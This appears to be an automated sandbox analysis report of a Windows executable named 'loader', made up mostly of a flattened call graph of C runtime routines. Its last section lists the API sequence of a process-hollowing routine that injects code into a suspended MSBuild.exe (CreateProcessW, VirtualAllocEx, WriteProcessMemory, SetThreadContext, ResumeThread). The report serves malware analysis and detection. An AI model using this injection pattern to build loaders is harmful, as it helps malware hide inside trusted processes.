9914 24e9b0 5 API calls std::_Throw_Cpp_error 9914->9915 9915->9910 9915->9912 9915->9914 9917 241041 9916->9917 9918 247eb0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9917->9918 9919 241451 9918->9919 9920 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9919->9920 9921 247e16 9920->9921 9921->9873 9923 24d560 std::_Throw_Cpp_error 48 API calls 9922->9923 9924 248eb6 9923->9924 9924->9873 9931 2551de EnterCriticalSection 9925->9931 9927 254c90 9927->9852 9932 2551ec LeaveCriticalSection 9928->9932 9930 253d9e 9930->9832 9931->9927 9932->9930 9934 25a15b __dosmaperr 14 API calls 9933->9934 9935 256e89 9934->9935 9936 256ecb ExitThread 9935->9936 9939 256ea2 9935->9939 9942 259d25 9935->9942 9938 256eb5 9938->9936 9941 256ec1 FreeLibraryAndExitThread 9938->9941 9939->9938 9940 256eae CloseHandle 9939->9940 9940->9938 9941->9936 9943 259e9e __dosmaperr 5 API calls 9942->9943 9944 259d3e 9943->9944 9944->9939 9946 254689 __EH_prolog3_GS 9945->9946 9947 2486c0 std::_Throw_Cpp_error 51 API calls 9946->9947 9948 25469d 9947->9948 9955 2545a6 9948->9955 9973 2542e6 9955->9973 9957 2545d7 9977 254533 9957->9977 9960 24d560 std::_Throw_Cpp_error 48 API calls 9961 2545f9 9960->9961 9962 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9961->9962 9963 254618 9962->9963 9964 24d560 9963->9964 9968 24d584 std::_Throw_Cpp_error 9964->9968 9965 24d6bf std::_Throw_Cpp_error 9966 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9965->9966 9967 24d6f5 9966->9967 9970 254bd9 9967->9970 9968->9965 10046 24d780 9968->10046 9971 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9970->9971 9972 254be3 9971->9972 9972->9972 9974 2542fe 9973->9974 9976 254305 CatchIt 9974->9976 9989 24f980 9974->9989 9976->9957 9978 25453f __EH_prolog3_GS 9977->9978 9980 25455e std::_Throw_Cpp_error 9978->9980 10016 25434e 9978->10016 9981 25434e std::_Throw_Cpp_error 51 API calls 9980->9981 9982 254583 9981->9982 9983 24d560 std::_Throw_Cpp_error 48 API calls 9982->9983 9984 25458b std::_Throw_Cpp_error 9983->9984 9985 24d560 std::_Throw_Cpp_error 48 API calls 9984->9985 9986 25459e 9985->9986 9987 254bd9 std::_Throw_Cpp_error 5 API calls 9986->9987 9988 2545a5 std::domain_error::domain_error 9987->9988 9988->9960 9991 24f9a4 9989->9991 9992 24feac 9991->9992 9996 24ff00 9991->9996 10004 250ff0 9991->10004 9993 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9992->9993 9994 24febc 9993->9994 9994->9976 10001 24ffa3 9996->10001 9997 250ff0 21 API calls std::_Throw_Cpp_error 9997->10001 9998 250642 9999 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9998->9999 10000 250fc0 9999->10000 10000->9991 10001->9997 10001->9998 10007 251010 10001->10007 10011 257d79 10001->10011 10005 2541c6 std::_Throw_Cpp_error 21 API calls 10004->10005 10006 251007 10005->10006 10006->9991 10008 25101e std::_Throw_Cpp_error 10007->10008 10009 2559fc std::_Xinvalid_argument RaiseException 10008->10009 10010 251036 10009->10010 10012 25809f __strnicoll 48 API calls 10011->10012 10013 257d88 10012->10013 10014 257d96 __strnicoll 11 API calls 10013->10014 10015 257d95 10014->10015 10017 25438f 10016->10017 10019 254365 CatchIt 10016->10019 10020 25476d 10017->10020 10019->9980 10021 254792 10020->10021 10022 254828 10020->10022 10031 24f4d0 10021->10031 10043 24f170 10022->10043 10027 24f980 std::_Throw_Cpp_error 51 API calls 10028 2547ae CatchIt 10027->10028 10029 2547fa CatchIt 10028->10029 10037 24d7f0 10028->10037 10029->10019 10033 24f718 10031->10033 10032 24f2e0 std::_Throw_Cpp_error 5 API calls 10032->10033 10033->10032 10034 24f94d 10033->10034 10035 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 10034->10035 10036 24f960 10035->10036 10036->10027 10040 24d8d2 10037->10040 10038 24e5ad std::_Throw_Cpp_error 10039 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 10038->10039 10041 24e5d5 10039->10041 10040->10038 10042 24e600 std::_Throw_Cpp_error 48 API calls 10040->10042 10041->10029 10042->10040 10044 254846 std::_Xinvalid_argument 50 API calls 10043->10044 10045 24f182 10044->10045 10047 24d7f0 std::_Throw_Cpp_error 48 API calls 10046->10047 10048 24d7ab 10047->10048 10048->9968 10050 254114 10049->10050 10051 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 10050->10051 10052 254196 10051->10052 10052->9745 10054 254968 GetExitCodeThread 10053->10054 10055 25499a 10053->10055 10054->10055 10056 254979 CloseHandle 10054->10056 10055->9688 10056->9688 10059 258477 ___scrt_is_nonwritable_in_current_image 10058->10059 10060 25a00a _unexpected 48 API calls 10059->10060 10063 25847c 10060->10063 10061 25835d __FrameHandler3::FrameUnwindToState 48 API calls 10062 2584a6 10061->10062 10063->10061 10065 256a7d 10064->10065 10066 256a8f ___scrt_uninitialize_crt 10064->10066 10067 256a8b 10065->10067 10069 25b4a7 10065->10069 10066->8904 10067->8904 10072 25b5d2 10069->10072 10075 25b6ab 10072->10075 10076 25b6b7 ___scrt_is_nonwritable_in_current_image 10075->10076 10083 258161 EnterCriticalSection 10076->10083 10078 25b6c1 ___scrt_uninitialize_crt 10079 25b72d 10078->10079 10084 25b61f 10078->10084 10092 25b74b 10079->10092 10083->10078 10085 25b62b ___scrt_is_nonwritable_in_current_image 10084->10085 10095 256aef EnterCriticalSection 10085->10095 10087 25b635 ___scrt_uninitialize_crt 10091 25b66e 10087->10091 10096 25b4b0 10087->10096 10109 25b69f 10091->10109 10208 258178 LeaveCriticalSection 10092->10208 10094 25b4ae 10094->10067 10095->10087 10097 25b4c5 __strnicoll 10096->10097 10098 25b4d7 10097->10098 10099 25b4cc 10097->10099 10112 25b515 10098->10112 10100 25b5d2 ___scrt_uninitialize_crt 77 API calls 10099->10100 10102 25b4d2 10100->10102 10104 257fd7 __strnicoll 48 API calls 10102->10104 10105 25b50f 10104->10105 10105->10091 10107 25b4f8 10125 25e11f 10107->10125 10207 256b03 LeaveCriticalSection 10109->10207 10111 25b68d 10111->10078 10113 25b4e1 10112->10113 10114 25b52e 10112->10114 10113->10102 10118 25d936 10113->10118 10114->10113 10115 25d936 ___scrt_uninitialize_crt 48 API calls 10114->10115 10116 25b54a 10115->10116 10136 25e45a 10116->10136 10119 25d957 10118->10119 10120 25d942 10118->10120 10119->10107 10121 25b757 __strnicoll 14 API calls 10120->10121 10122 25d947 10121->10122 10123 257d69 __strnicoll 48 API calls 10122->10123 10124 25d952 10123->10124 10124->10107 10126 25e130 10125->10126 10127 25e13d 10125->10127 10128 25b757 __strnicoll 14 API calls 10126->10128 10129 25e186 10127->10129 10131 25e164 10127->10131 10134 25e135 10128->10134 10130 25b757 __strnicoll 14 API calls 10129->10130 10132 25e18b 10130->10132 10177 25e19c 10131->10177 10133 257d69 __strnicoll 48 API calls 10132->10133 10133->10134 10134->10102 10138 25e466 ___scrt_is_nonwritable_in_current_image 10136->10138 10137 25e4a7 10140 257f12 __strnicoll 29 API calls 10137->10140 10138->10137 10139 25e4ed 10138->10139 10146 25e46e 10138->10146 10147 25d8d7 EnterCriticalSection 10139->10147 10140->10146 10142 25e4f3 10143 25e511 10142->10143 10148 25e23e 10142->10148 10174 25e563 10143->10174 10146->10113 10147->10142 10149 25e266 10148->10149 10172 25e289 ___scrt_uninitialize_crt 10148->10172 10150 25e26a 10149->10150 10152 25e2c5 10149->10152 10151 257f12 __strnicoll 29 API calls 10150->10151 10151->10172 10153 25e2e3 10152->10153 10155 25fa51 ___scrt_uninitialize_crt 50 API calls 10152->10155 10154 25e56b ___scrt_uninitialize_crt 49 API calls 10153->10154 10156 25e2f5 10154->10156 10155->10153 10157 25e342 10156->10157 10158 25e2fb 10156->10158 10161 25e356 10157->10161 10162 25e3ab WriteFile 10157->10162 10159 25e303 10158->10159 10160 25e32a 10158->10160 10169 25e9af ___scrt_uninitialize_crt 6 API calls 10159->10169 10159->10172 10165 25e5e8 ___scrt_uninitialize_crt 54 API calls 10160->10165 10163 25e397 10161->10163 10164 25e35e 10161->10164 10166 25e3cd GetLastError 10162->10166 10162->10172 10170 25ea17 ___scrt_uninitialize_crt 7 API calls 10163->10170 10167 25e383 10164->10167 10168 25e363 10164->10168 10165->10172 10166->10172 10171 25ebdb ___scrt_uninitialize_crt 8 API calls 10167->10171 10168->10172 10173 25eaf2 ___scrt_uninitialize_crt 7 API calls 10168->10173 10169->10172 10170->10172 10171->10172 10172->10143 10173->10172 10175 25d8fa ___scrt_uninitialize_crt LeaveCriticalSection 10174->10175 10176 25e569 10175->10176 10176->10146 10178 25e1a8 ___scrt_is_nonwritable_in_current_image 10177->10178 10190 25d8d7 EnterCriticalSection 10178->10190 10180 25e1b7 10181 25e1fc 10180->10181 10191 25d68e 10180->10191 10183 25b757 __strnicoll 14 API calls 10181->10183 10185 25e203 10183->10185 10184 25e1e3 FlushFileBuffers 10184->10185 10186 25e1ef GetLastError 10184->10186 10204 25e232 10185->10204 10187 25b76a __dosmaperr 14 API calls 10186->10187 10187->10181 10190->10180 10192 25d69b 10191->10192 10194 25d6b0 10191->10194 10193 25b76a __dosmaperr 14 API calls 10192->10193 10196 25d6a0 10193->10196 10195 25b76a __dosmaperr 14 API calls 10194->10195 10199 25d6d5 10194->10199 10197 25d6e0 10195->10197 10198 25b757 __strnicoll 14 API calls 10196->10198 10200 25b757 __strnicoll 14 API calls 10197->10200 10201 25d6a8 10198->10201 10199->10184 10202 25d6e8 10200->10202 10201->10184 10203 257d69 __strnicoll 48 API calls 10202->10203 10203->10201 10205 25d8fa ___scrt_uninitialize_crt LeaveCriticalSection 10204->10205 10206 25e21b 10205->10206 10206->10134 10207->10111 10208->10094 8759 24be70 8760 24be9b 8759->8760 8763 256ed5 8760->8763 8766 257020 8763->8766 8767 25704d 8766->8767 8768 25705f 8766->8768 8793 2553ec GetModuleHandleW 8767->8793 8778 2571ba 8768->8778 8771 24beaf 8776 2570b1 8779 2571c6 ___scrt_is_nonwritable_in_current_image 8778->8779 8801 258161 EnterCriticalSection 8779->8801 8781 2571d0 8802 2570b7 8781->8802 8783 2571dd 8806 2571fb 8783->8806 8786 256fef 8831 256fd6 8786->8831 8788 256ff9 8789 25700d 8788->8789 8790 256ffd GetCurrentProcess TerminateProcess 8788->8790 8791 256f54 _unexpected 3 API calls 8789->8791 8790->8789 8792 257015 ExitProcess 8791->8792 8794 2553f8 8793->8794 8794->8768 8795 256f54 GetModuleHandleExW 8794->8795 8796 256fb4 8795->8796 8797 256f93 GetProcAddress 8795->8797 8799 256fc3 8796->8799 8800 256fba FreeLibrary 8796->8800 8797->8796 8798 256fa7 8797->8798 8798->8796 8799->8768 8800->8799 8801->8781 8804 2570c3 ___scrt_is_nonwritable_in_current_image _unexpected 8802->8804 8803 257127 _unexpected 8803->8783 8804->8803 8809 25776b 8804->8809 8830 258178 LeaveCriticalSection 8806->8830 8808 257096 8808->8771 8808->8786 8810 257777 __EH_prolog3 8809->8810 8813 2579f6 8810->8813 8812 25779e _unexpected 8812->8803 8814 257a02 ___scrt_is_nonwritable_in_current_image 8813->8814 8821 258161 EnterCriticalSection 8814->8821 8816 257a10 8822 2578c1 8816->8822 8821->8816 8823 2578e0 8822->8823 8824 2578d8 8822->8824 8823->8824 8825 25b0cb ___free_lconv_mon 14 API calls 8823->8825 8826 257a45 8824->8826 8825->8824 8829 258178 LeaveCriticalSection 8826->8829 8828 257a2e 8828->8812 8829->8828 8830->8808 8834 25b94f 8831->8834 8833 256fdb _unexpected 8833->8788 8835 25b95e _unexpected 8834->8835 8836 25b96b 8835->8836 8838 259d53 8835->8838 8836->8833 8839 259e9e __dosmaperr 5 API calls 8838->8839 8840 259d6f 8839->8840 8840->8836 11225 25a5f0 11226 25a5fc ___scrt_is_nonwritable_in_current_image 11225->11226 11237 258161 EnterCriticalSection 11226->11237 11228 25a603 11238 25d839 11228->11238 11231 25a621 11257 25a647 11231->11257 11236 25a732 2 API calls 11236->11231 11237->11228 11239 25d845 ___scrt_is_nonwritable_in_current_image 11238->11239 11240 25d86f 11239->11240 11241 25d84e 11239->11241 11260 258161 EnterCriticalSection 11240->11260 11243 25b757 __strnicoll 14 API calls 11241->11243 11244 25d853 11243->11244 11245 257d69 __strnicoll 48 API calls 11244->11245 11247 25a612 11245->11247 11246 25d8a7 11268 25d8ce 11246->11268 11247->11231 11251 25a67c GetStartupInfoW 11247->11251 11250 25d87b 11250->11246 11261 25d789 11250->11261 11252 25a61c 11251->11252 11253 25a699 11251->11253 11252->11236 11253->11252 11254 25d839 49 API calls 11253->11254 11255 25a6c1 11254->11255 11255->11252 11256 25a6f1 GetFileType 11255->11256 11256->11255 11272 258178 LeaveCriticalSection 11257->11272 11259 25a632 11260->11250 11262 25b807 __dosmaperr 14 API calls 11261->11262 11264 25d79b 11262->11264 11263 25d7a8 11265 25b0cb ___free_lconv_mon 14 API calls 11263->11265 11264->11263 11266 259c11 6 API calls 11264->11266 11267 25d7fd 11265->11267 11266->11264 11267->11250 11271 258178 LeaveCriticalSection 11268->11271 11270 25d8d5 11270->11247 11271->11270 11272->11259 11282 256bf0 11283 25b4a7 ___scrt_uninitialize_crt 77 API calls 11282->11283 11284 256bf8 11283->11284 11292 25b864 11284->11292 11286 256bfd 11302 25b90f 11286->11302 11289 256c27 11290 25b0cb ___free_lconv_mon 14 API calls 11289->11290 11291 256c32 11290->11291 11293 25b870 ___scrt_is_nonwritable_in_current_image 11292->11293 11306 258161 EnterCriticalSection 11293->11306 11295 25b8e7 11313 25b906 11295->11313 11297 25b87b 11297->11295 11299 25b8bb DeleteCriticalSection 11297->11299 11307 25ed63 11297->11307 11300 25b0cb ___free_lconv_mon 14 API calls 11299->11300 11300->11297 11303 25b926 11302->11303 11305 256c0c DeleteCriticalSection 11302->11305 11304 25b0cb ___free_lconv_mon 14 API calls 11303->11304 11303->11305 11304->11305 11305->11286 11305->11289 11306->11297 11308 25ed76 __strnicoll 11307->11308 11316 25ee21 11308->11316 11310 25ed82 11311 257fd7 __strnicoll 48 API calls 11310->11311 11312 25ed8e 11311->11312 11312->11297 11388 258178 LeaveCriticalSection 11313->11388 11315 25b8f3 11315->11286 11317 25ee2d ___scrt_is_nonwritable_in_current_image 11316->11317 11318 25ee37 11317->11318 11319 25ee5a 11317->11319 11320 257f12 __strnicoll 29 API calls 11318->11320 11326 25ee52 11319->11326 11327 256aef EnterCriticalSection 11319->11327 11320->11326 11322 25ee78 11328 25ed93 11322->11328 11324 25ee85 11342 25eeb0 11324->11342 11326->11310 11327->11322 11329 25eda0 11328->11329 11330 25edc3 11328->11330 11331 257f12 __strnicoll 29 API calls 11329->11331 11332 25b515 ___scrt_uninitialize_crt 73 API calls 11330->11332 11340 25edbb 11330->11340 11331->11340 11333 25eddb 11332->11333 11334 25b90f 14 API calls 11333->11334 11335 25ede3 11334->11335 11336 25d936 ___scrt_uninitialize_crt 48 API calls 11335->11336 11337 25edef 11336->11337 11345 26001b 11337->11345 11340->11324 11341 25b0cb ___free_lconv_mon 14 API calls 11341->11340 11387 256b03 LeaveCriticalSection 11342->11387 11344 25eeb6 11344->11326 11346 260044 11345->11346 11347 25edf6 11345->11347 11348 260093 11346->11348 11350 26006b 11346->11350 11347->11340 11347->11341 11349 257f12 __strnicoll 29 API calls 11348->11349 11349->11347 11352 2600be 11350->11352 11353 2600ca ___scrt_is_nonwritable_in_current_image 11352->11353 11360 25d8d7 EnterCriticalSection 11353->11360 11355 2600d8 11356 260109 11355->11356 11361 25ff7b 11355->11361 11374 260143 11356->11374 11360->11355 11362 25d68e ___scrt_uninitialize_crt 48 API calls 11361->11362 11363 25ff8b 11362->11363 11364 25ff91 11363->11364 11366 25ffc3 11363->11366 11368 25d68e ___scrt_uninitialize_crt 48 API calls 11363->11368 11377 25d6f8 11364->11377 11366->11364 11367 25d68e ___scrt_uninitialize_crt 48 API calls 11366->11367 11369 25ffcf CloseHandle 11367->11369 11370 25ffba 11368->11370 11369->11364 11371 25ffdb GetLastError 11369->11371 11372 25d68e ___scrt_uninitialize_crt 48 API calls 11370->11372 11371->11364 11372->11366 11373 25ffe9 ___scrt_uninitialize_crt 11373->11356 11386 25d8fa LeaveCriticalSection 11374->11386 11376 26012c 11376->11347 11378 25d707 11377->11378 11379 25d76e 11377->11379 11378->11379 11385 25d731 11378->11385 11380 25b757 __strnicoll 14 API calls 11379->11380 11381 25d773 11380->11381 11382 25b76a __dosmaperr 14 API calls 11381->11382 11383 25d75e 11382->11383 11383->11373 11384 25d758 SetStdHandle 11384->11383 11385->11383 11385->11384 11386->11376 11387->11344 11388->11315 8525 25bc45 8526 25bc83 8525->8526 8530 25bc53 __dosmaperr 8525->8530 8535 25b757 8526->8535 8527 25bc6e RtlAllocateHeap 8529 25bc81 8527->8529 8527->8530 8530->8526 8530->8527 8532 257207 8530->8532 8538 257242 8532->8538 8549 25a15b GetLastError 8535->8549 8537 25b75c 8537->8529 8539 25724e ___scrt_is_nonwritable_in_current_image 8538->8539 8544 258161 EnterCriticalSection 8539->8544 8541 257259 _unexpected 8545 257290 8541->8545 8544->8541 8548 258178 LeaveCriticalSection 8545->8548 8547 257212 8547->8530 8548->8547 8550 25a171 8549->8550 8551 25a177 8549->8551 8572 259b90 8550->8572 8569 25a17b SetLastError 8551->8569 8577 259bcf 8551->8577 8558 25a1c1 8561 259bcf __dosmaperr 6 API calls 8558->8561 8559 25a1b0 8560 259bcf __dosmaperr 6 API calls 8559->8560 8562 25a1be 8560->8562 8563 25a1cd 8561->8563 8591 25b0cb 8562->8591 8564 25a1d1 8563->8564 8565 25a1e8 8563->8565 8568 259bcf __dosmaperr 6 API calls 8564->8568 8597 25a31c 8565->8597 8568->8562 8569->8537 8571 25b0cb ___free_lconv_mon 12 API calls 8571->8569 8602 259e9e 8572->8602 8575 259bb5 8575->8551 8576 259bc7 TlsGetValue 8578 259e9e __dosmaperr 5 API calls 8577->8578 8579 259beb 8578->8579 8580 259bf4 8579->8580 8581 259c09 TlsSetValue 8579->8581 8580->8569 8582 25b807 8580->8582 8583 25b814 8582->8583 8584 25b83f HeapAlloc 8583->8584 8585 25b854 8583->8585 8588 25b828 __dosmaperr 8583->8588 8586 25b852 8584->8586 8584->8588 8587 25b757 __strnicoll 13 API calls 8585->8587 8589 25a1a8 8586->8589 8587->8589 8588->8584 8588->8585 8590 257207 __dosmaperr 2 API calls 8588->8590 8589->8558 8589->8559 8590->8588 8592 25b0d6 RtlFreeHeap 8591->8592 8593 25b100 8591->8593 8592->8593 8594 25b0eb GetLastError 8592->8594 8593->8569 8595 25b0f8 __dosmaperr 8594->8595 8596 25b757 __strnicoll 12 API calls 8595->8596 8596->8593 8617 25a482 8597->8617 8603 259ece 8602->8603 8606 259bac 8602->8606 8603->8606 8609 259dd3 8603->8609 8606->8575 8606->8576 8607 259ee8 GetProcAddress 8607->8606 8608 259ef8 __dosmaperr 8607->8608 8608->8606 8615 259de4 ___vcrt_FlsGetValue 8609->8615 8610 259e7a 8610->8606 8610->8607 8611 259e02 LoadLibraryExW 8612 259e81 8611->8612 8613 259e1d GetLastError 8611->8613 8612->8610 8614 259e93 FreeLibrary 8612->8614 8613->8615 8614->8610 8615->8610 8615->8611 8616 259e50 LoadLibraryExW 8615->8616 8616->8612 8616->8615 8618 25a48e ___scrt_is_nonwritable_in_current_image 8617->8618 8631 258161 EnterCriticalSection 8618->8631 8620 25a498 8632 25a4c8 8620->8632 8623 25a4d4 8624 25a4e0 ___scrt_is_nonwritable_in_current_image 8623->8624 8636 258161 EnterCriticalSection 8624->8636 8626 25a4ea 8637 25a2d1 8626->8637 8628 25a502 8641 25a522 8628->8641 8631->8620 8635 258178 LeaveCriticalSection 8632->8635 8634 25a38a 8634->8623 8635->8634 8636->8626 8638 25a2e0 __strnicoll 8637->8638 8640 25a307 __strnicoll 8637->8640 8638->8640 8644 25bfae 8638->8644 8640->8628 8758 258178 LeaveCriticalSection 8641->8758 8643 25a1f3 8643->8571 8645 25c02e 8644->8645 8648 25bfc4 8644->8648 8646 25c07c 8645->8646 8649 25b0cb ___free_lconv_mon 14 API calls 8645->8649 8712 25c148 8646->8712 8648->8645 8651 25bff7 8648->8651 8656 25b0cb ___free_lconv_mon 14 API calls 8648->8656 8650 25c050 8649->8650 8652 25b0cb ___free_lconv_mon 14 API calls 8650->8652 8653 25c019 8651->8653 8658 25b0cb ___free_lconv_mon 14 API calls 8651->8658 8654 25c063 8652->8654 8655 25b0cb ___free_lconv_mon 14 API calls 8653->8655 8657 25b0cb ___free_lconv_mon 14 API calls 8654->8657 8659 25c023 8655->8659 8661 25bfec 8656->8661 8663 25c071 8657->8663 8664 25c00e 8658->8664 8665 25b0cb ___free_lconv_mon 14 API calls 8659->8665 8660 25c0ea 8666 25b0cb ___free_lconv_mon 14 API calls 8660->8666 8672 25b9d5 8661->8672 8662 25c08a 8662->8660 8668 25b0cb 14 API calls ___free_lconv_mon 8662->8668 8669 25b0cb ___free_lconv_mon 14 API calls 8663->8669 8700 25bad3 8664->8700 8665->8645 8671 25c0f0 8666->8671 8668->8662 8669->8646 8671->8640 8673 25b9e6 8672->8673 8674 25bacf 8672->8674 8675 25b9f7 8673->8675 8676 25b0cb ___free_lconv_mon 14 API calls 8673->8676 8674->8651 8677 25ba09 8675->8677 8679 25b0cb ___free_lconv_mon 14 API calls 8675->8679 8676->8675 8678 25ba1b 8677->8678 8680 25b0cb ___free_lconv_mon 14 API calls 8677->8680 8681 25ba2d 8678->8681 8682 25b0cb ___free_lconv_mon 14 API calls 8678->8682 8679->8677 8680->8678 8683 25ba3f 8681->8683 8684 25b0cb ___free_lconv_mon 14 API calls 8681->8684 8682->8681 8685 25ba51 8683->8685 8687 25b0cb ___free_lconv_mon 14 API calls 8683->8687 8684->8683 8686 25ba63 8685->8686 8688 25b0cb ___free_lconv_mon 14 API calls 8685->8688 8689 25ba75 8686->8689 8690 25b0cb ___free_lconv_mon 14 API calls 8686->8690 8687->8685 8688->8686 8691 25ba87 8689->8691 8692 25b0cb ___free_lconv_mon 14 API calls 8689->8692 8690->8689 8693 25ba99 8691->8693 8695 25b0cb ___free_lconv_mon 14 API calls 8691->8695 8692->8691 8694 25baab 8693->8694 8696 25b0cb ___free_lconv_mon 14 API calls 8693->8696 8697 25babd 8694->8697 8698 25b0cb ___free_lconv_mon 14 API calls 8694->8698 8695->8693 8696->8694 8697->8674 8699 25b0cb ___free_lconv_mon 14 API calls 8697->8699 8698->8697 8699->8674 8701 25bae0 8700->8701 8711 25bb38 8700->8711 8702 25b0cb ___free_lconv_mon 14 API calls 8701->8702 8704 25baf0 8701->8704 8702->8704 8703 25bb02 8706 25bb14 8703->8706 8707 25b0cb ___free_lconv_mon 14 API calls 8703->8707 8704->8703 8705 25b0cb ___free_lconv_mon 14 API calls 8704->8705 8705->8703 8708 25bb26 8706->8708 8709 25b0cb ___free_lconv_mon 14 API calls 8706->8709 8707->8706 8710 25b0cb ___free_lconv_mon 14 API calls 8708->8710 8708->8711 8709->8708 8710->8711 8711->8653 8713 25c174 8712->8713 8714 25c155 8712->8714 8713->8662 8714->8713 8718 25bb3c 8714->8718 8717 25b0cb ___free_lconv_mon 14 API calls 8717->8713 8719 25bc1a 8718->8719 8720 25bb4d 8718->8720 8719->8717 8754 25bc20 8720->8754 8723 25bc20 __strnicoll 14 API calls 8724 25bb60 8723->8724 8725 25bc20 __strnicoll 14 API calls 8724->8725 8726 25bb6b 8725->8726 8727 25bc20 __strnicoll 14 API calls 8726->8727 8728 25bb76 8727->8728 8729 25bc20 __strnicoll 14 API calls 8728->8729 8730 25bb84 8729->8730 8731 25b0cb ___free_lconv_mon 14 API calls 8730->8731 8732 25bb8f 8731->8732 8733 25b0cb ___free_lconv_mon 14 API calls 8732->8733 8734 25bb9a 8733->8734 8735 25b0cb ___free_lconv_mon 14 API calls 8734->8735 8736 25bba5 8735->8736 8737 25bc20 __strnicoll 14 API calls 8736->8737 8738 25bbb3 8737->8738 8739 25bc20 __strnicoll 14 API calls 8738->8739 8740 25bbc1 8739->8740 8741 25bc20 __strnicoll 14 API calls 8740->8741 8742 25bbd2 8741->8742 8743 25bc20 __strnicoll 14 API calls 8742->8743 8744 25bbe0 8743->8744 8745 25bc20 __strnicoll 14 API calls 8744->8745 8746 25bbee 8745->8746 8747 25b0cb ___free_lconv_mon 14 API calls 8746->8747 8748 25bbf9 8747->8748 8749 25b0cb ___free_lconv_mon 14 API calls 8748->8749 8750 25bc04 8749->8750 8751 25b0cb ___free_lconv_mon 14 API calls 8750->8751 8752 25bc0f 8751->8752 8753 25b0cb ___free_lconv_mon 14 API calls 8752->8753 8753->8719 8755 25bc32 8754->8755 8756 25bb55 8755->8756 8757 25b0cb ___free_lconv_mon 14 API calls 8755->8757 8756->8723 8757->8755 8758->8643

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0026B0FF,0026B0EF), ref: 0026B323
                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0026B336
                                                                                      • Wow64GetThreadContext.KERNEL32(00000138,00000000), ref: 0026B354
                                                                                      • ReadProcessMemory.KERNELBASE(00000134,?,0026B143,00000004,00000000), ref: 0026B378
                                                                                      • VirtualAllocEx.KERNELBASE(00000134,?,?,00003000,00000040), ref: 0026B3A3
                                                                                      • TerminateProcess.KERNELBASE(00000134,00000000), ref: 0026B3C2
                                                                                      • WriteProcessMemory.KERNELBASE(00000134,00000000,?,?,00000000,?), ref: 0026B3FB
                                                                                      • WriteProcessMemory.KERNELBASE(00000134,00400000,?,?,00000000,?,00000028), ref: 0026B446
                                                                                      • WriteProcessMemory.KERNELBASE(00000134,?,?,00000004,00000000), ref: 0026B484
                                                                                      • Wow64SetThreadContext.KERNEL32(00000138,02F30000), ref: 0026B4C0
                                                                                      • ResumeThread.KERNELBASE(00000138), ref: 0026B4CF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                      • API String ID: 2440066154-3857624555
                                                                                      • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                      • Instruction ID: f3aca2335252410e4c7689d7dcb3fc30d53cfbfcb373111d5a8502e083814806
                                                                                      • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                      • Instruction Fuzzy Hash: 66B1E57660068AAFDB60CF68CC80BDA73A5FF88714F158564EA08EB341D774FA51CB94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
